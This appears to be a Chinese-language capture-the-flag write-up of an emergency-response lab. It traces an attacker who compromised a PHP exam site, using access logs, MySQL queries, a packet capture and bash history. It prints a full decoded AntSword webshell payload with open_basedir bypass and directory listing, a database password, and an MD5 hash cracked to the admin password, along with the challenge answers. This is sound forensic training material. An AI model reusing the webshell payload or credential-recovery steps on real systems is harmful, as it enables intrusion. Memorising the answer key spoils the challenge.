# 题目 1
通过本地 PC SSH 到服务器并且分析黑客的 IP 为多少,将黑客 IP 作为 FLAG 提交;
[root@ip-10-0-10-2 ~]# cat /www/wwwlogs/access.log | cut -d" " -f1 | sort | uniq -c
456 127.0.0.1
114 192.168.20.1
127.0.0.1 是本机回环地址,日志里唯一的外部来源 192.168.20.1 就是黑客 IP
flag: flag{192.168.20.1}
# 题目 2
通过本地 PC SSH 到服务器并且分析黑客修改的管理员密码 (明文) 为多少,将黑客修改的管理员密码 (明文) 作为 FLAG 提交;
直接去数据库里读
[root@ip-10-0-10-2 ~]# cat /www/wwwroot/127.0.0.1/lib/config.inc.php | |
... | |
/** 数据库设置 */ | |
define('SQLDEBUG',0); | |
define('DB','kaoshi');//MYSQL数据库名 | |
define('DH','127.0.0.1');//MYSQL主机名,不用改 | |
define('DU','kaoshi');//MYSQL数据库用户名 | |
define('DP','5Sx8mK5ieyLPb84m');//MYSQL数据库用户密码 | |
define('DTH','x2_');//系统表前缀,不用改 | |
... |
[root@ip-10-0-10-2 ~]# mysql -h 127.0.0.1 -u kaoshi -p5Sx8mK5ieyLPb84m | |
mysql: [Warning] Using a password on the command line interface can be insecure. | |
Welcome to the MySQL monitor. Commands end with ; or \g. | |
Your MySQL connection id is 9 | |
Server version: 5.7.44-log Source distribution | |
Copyright (c) 2000, 2023, Oracle and/or its affiliates. | |
Oracle is a registered trademark of Oracle Corporation and/or its | |
affiliates. Other names may be trademarks of their respective | |
owners. | |
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. | |
mysql> use kaoshi; | |
Database changed | |
mysql> show tables; | |
+---------------------+ | |
| Tables_in_kaoshi | | |
+---------------------+ | |
| x2_answer | | |
| x2_app | | |
| x2_area | | |
| x2_ask | | |
| x2_attach | | |
| x2_attachtype | | |
| x2_basic | | |
| x2_block | | |
| x2_category | | |
| x2_cequeue | | |
| x2_certificate | | |
| x2_city | | |
| x2_cityarea | | |
| x2_cnttouser | | |
| x2_comment | | |
| x2_config | | |
| x2_consumelog | | |
| x2_content | | |
| x2_coupon | | |
| x2_course | | |
| x2_coursesubject | | |
| x2_docfloder | | |
| x2_dochistory | | |
| x2_docs | | |
| x2_examhistory | | |
| x2_exams | | |
| x2_examsession | | |
| x2_exercise | | |
| x2_favor | | |
| x2_feedback | | |
| x2_knows | | |
| x2_log | | |
| x2_module | | |
| x2_module_fields | | |
| x2_navs | | |
| x2_openbasics | | |
| x2_opencourse | | |
| x2_orders | | |
| x2_poscontent | | |
| x2_position | | |
| x2_progress | | |
| x2_province | | |
| x2_quest2knows | | |
| x2_questionanalysis | | |
| x2_questionrows | | |
| x2_questions | | |
| x2_questype | | |
| x2_record | | |
| x2_recorddata | | |
| x2_reply | | |
| x2_sections | | |
| x2_seminar | | |
| x2_seminar_content | | |
| x2_seminar_elem | | |
| x2_seminar_layout | | |
| x2_seminar_tpls | | |
| x2_session | | |
| x2_subject | | |
| x2_user | | |
| x2_user_group | | |
| x2_wxlogin | | |
+---------------------+ | |
61 rows in set (0.00 sec) | |
mysql> select * from x2_user_group; | |
+---------+--------------+---------------+---------------+------------+--------------------+--------------+ | |
| groupid | groupname | groupmoduleid | groupdescribe | groupright | groupmoduledefault | groupdefault | | |
+---------+--------------+---------------+---------------+------------+--------------------+--------------+ | |
| 1 | 管理员 | 1 | 管理员 | | 1 | 0 | | |
| 8 | 普通用户 | 9 | 普通用户 | | 0 | 1 | | |
| 9 | 教师 | 12 | 教师 | | 0 | 0 | | |
+---------+--------------+---------------+---------------+------------+--------------------+--------------+ | |
3 rows in set (0.04 sec) | |
mysql> select * from x2_user; | |
+--------+------------+-------------+-----------------+----------------+----------------------------------+----------+----------------+-------------+-------------+----------------+-------------+--------------+------------+------------------------------------------------------------------------------------------------------------------------------+--------------------+--------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------+------------+-----------+-------------+---------------------------------------------------------+------------+------------+ | |
| userid | useropenid | userunionid | username | useremail | userpassword | usercoin | userregip | userregtime | userlogtime | userverifytime | usergroupid | usermoduleid | useranswer | manager_apps | usertruename | normal_favor | teacher_subjects | userprofile | usergender | userphone | useraddress | userphoto | userstatus | normal_sfz | | |
+--------+------------+-------------+-----------------+----------------+----------------------------------+----------+----------------+-------------+-------------+----------------+-------------+--------------+------------+------------------------------------------------------------------------------------------------------------------------------+--------------------+--------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------+------------+-----------+-------------+---------------------------------------------------------+------------+------------+ | |
| 1 | | NULL | peadmin | 958074@163.com | f6f6eb5ace977d7e114377cc7098b7e3 | 279 | 127.0.0.1 | 1471795200 | 0 | NULL | 1 | 0 | NULL | a:7:{i:0;s:4:"user";i:1;s:7:"content";i:2;s:4:"exam";i:3;s:8:"document";i:4;s:6:"course";i:5;s:4:"bank";i:6;s:8:"autoform";} | 111111111111111111 | | | | 男 | | 信息部 | files/attach/images/content/20230802/16909740072788.jpg | 3 | | | |
| 2 | | NULL | 教师管理员 | 958074@126.com | 96e79218965eb72c92a549dd5a330112 | 98 | 127.0.0.1 | 1471795200 | 0 | NULL | 9 | 0 | NULL | | 213123 | | a:14:{i:0;s:2:"13";i:1;s:2:"12";i:2;s:1:"5";i:3;s:1:"4";i:4;s:1:"3";i:5;s:1:"1";i:6;s:1:"2";i:7;s:2:"17";i:8;s:2:"15";i:9;s:2:"16";i:10;s:2:"18";i:11;s:2:"19";i:12;s:2:"20";i:13;s:2:"21";} | 77777 | | | | | 3 | | | |
| 3 | | | zgsf | [email protected] | af0c68603004a1b5af4d87a71a813057 | 0 | 192.168.20.131 | 1709795218 | 0 | 0 | 8 | 0 | | | | | | | | | | | 0 | | | |
| 4 | | | zgsfAdmin | [email protected] | ed2b3e3ce2425550d8bfdea8b80cc89a | 0 | 192.168.20.131 | 1709796233 | 0 | 0 | 8 | 0 | | | | | | | | | | | 0 | | | |
+--------+------------+-------------+-----------------+----------------+----------------------------------+----------+----------------+-------------+-------------+----------------+-------------+--------------+------------+------------------------------------------------------------------------------------------------------------------------------+--------------------+--------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------+------------+-----------+-------------+---------------------------------------------------------+------------+------------+ | |
4 rows in set (0.00 sec) |
peadmin 是管理员:用户 ID 是 1,且 usergroupid 为 1,对应 x2_user_group 表中的"管理员"组
userpassword 列存的是 32 位十六进制的 MD5 值 (看起来未加盐,所以可以直接查表还原): f6f6eb5ace977d7e114377cc7098b7e3
解开为: Network@2020
flag: flag{Network@2020}
# 题目 3
通过本地 PC SSH 到服务器并且分析黑客第一次 Webshell 的连接 URL 为多少,将黑客第一次 Webshell 的连接 URL 作为 FLAG 提交 (无需域名 flag {xxx.php?abc-app-upload});
网站扫了一下没扫出来
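看到服务器上有 pcap 流量包,下载下来用 Wireshark 看一眼
http 过滤后一看吓一跳
点开看下流量
从请求体特征 (以 @ini_set("display_errors", "0");@set_time_limit(0); 开头,并带有 asenc/asoutput 函数) 一眼就能认出是蚁剑 (AntSword) 的流量,第一条这类请求的 URL 即为答案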
flag: flag{index.php?user-app-register}
# 题目 4
通过本地 PC SSH 到服务器并且分析黑客 Webshell 连接密码多少,将黑客 Webshell 连接密码 作为 FLAG 提交;
把流量中的 POST 请求体做一下 URL 解码,请求体里第一个参数的参数名 (这里是 Network2020) 就是 Webshell 的连接密码
Network2020=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.effe42";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "37de"."699c";echo @asenc($output);echo "e28ef"."b7f3d";}ob_start();try{$D=base64_decode(substr($_POST["x0b6b31b98f31d"],2));$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R=" ".$T." ".@filesize($P)." ".$E." | |
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();&x0b6b31b98f31d=fEL3d3dy93d3dyb290LzEyNy4wLjAuMS8= |
flag: flag{Network2020}
# 题目 5
通过本地 PC SSH 到服务器并且分析黑客使用的后续上传的木马文件名称为多少,将黑客使用的后续上传的木马文件名称 作为 FLAG 提交;
看了一下 history
50 ls
51 rm -rf flag1 1
52 ls
53 rm -rf version2.php
54 ls
55 hardlink
56 hwclock
57 ls
58 docker ps
59 rm -rf pe9.sql
试了一下 flag1,不行
流量里有 version2.php,试了可以
flag: flag{version2.php}
# 题目 6
通过本地 PC SSH 到服务器并且分析黑客隐藏的 flag2, 将黑客隐藏的 flag2 作为 FLAG 提交;
看了一下 history,发现黑客用 vim 修改了 .api/ 目录下的文件
89 ls
90 cd .api/
91 ls
92 vim mpnotify.php
93 yum install vim
94 ls
95 vim alinotify.php
[root@ip-10-0-10-2 ~]# cat -n /www/wwwroot/127.0.0.1/.api/alinotify.php
...
55 include PEPATH.'/lib/init.cls.php';
56 $app = new app(new ginkgo);
57 $app->run();
58 $flag2 = "flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}";
...
flag: flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
# 题目 7
通过本地 PC SSH 到服务器并且分析黑客隐藏的 flag3, 将黑客隐藏的 flag3 作为 FLAG 提交;
看了一下 history,发现 flag3
102 $flag3 = [root@web-server .api]# useradd flag3{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
103 useradd: invalid user name 'flag3{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}'
104 $flag3 = flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
flag: flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}